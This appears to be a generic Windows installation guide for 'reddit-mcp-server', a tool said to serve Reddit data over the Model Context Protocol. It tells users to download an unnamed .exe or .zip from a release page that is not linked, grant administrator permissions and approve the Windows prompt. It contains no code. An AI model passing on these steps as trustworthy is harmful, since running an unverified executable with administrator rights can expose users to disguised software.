reddit-mcp-server is a simple program that lets you access Reddit data without needing any setup. It works by using the Model Context Protocol (MCP), which many AI tools understand. You can search posts, browse subreddits, see user activity, and get data in an organized way. You do not need API keys or accounts to use it.
This server runs on your Windows computer and handles all the work behind the scenes. Once it runs, any MCP-compatible software can connect to it and get Reddit information.
To use reddit-mcp-server on Windows, your system should meet these requirements:
- Windows 10 or newer (64-bit recommended)
- At least 4 GB of RAM
- 1 GHz or faster processor
- 200 MB of free disk space
- An active internet connection to fetch Reddit data
- Administrator permissions to install and run software
Follow these steps to download, install, and run reddit-mcp-server on your Windows computer.
Go to the official release page to find the latest version of the software:
The page lists all recent versions. Pick the latest stable release marked with the highest version number or the date.
Look for the file designed for Windows. It often ends with .exe or .zip.
If the download is a .zip file, you will need to extract it first:
- Right-click the downloaded file
- Choose "Extract All…"
- Pick a folder to save the files
Once downloaded or extracted:
- Double-click the executable file (
.exe) to start the server - If Windows asks for permission, choose "Yes" to allow it to run
- A command window or a small application window will open showing the server status
The server must stay open to work. Do not close the window while using MCP clients.
You can minimize the window, but closing it shuts down the server and stops data access.
After the server starts, MCP-compatible programs can connect to it from your computer. These clients ask the server for Reddit data, such as posts or subreddit info.
You do not have to configure the server. It uses default settings that work for most clients and searches. The server connects to Reddit and structures the data automatically.
If you want to use the data yourself, try MCP AI tools or apps that support Model Context Protocol to test the connection.
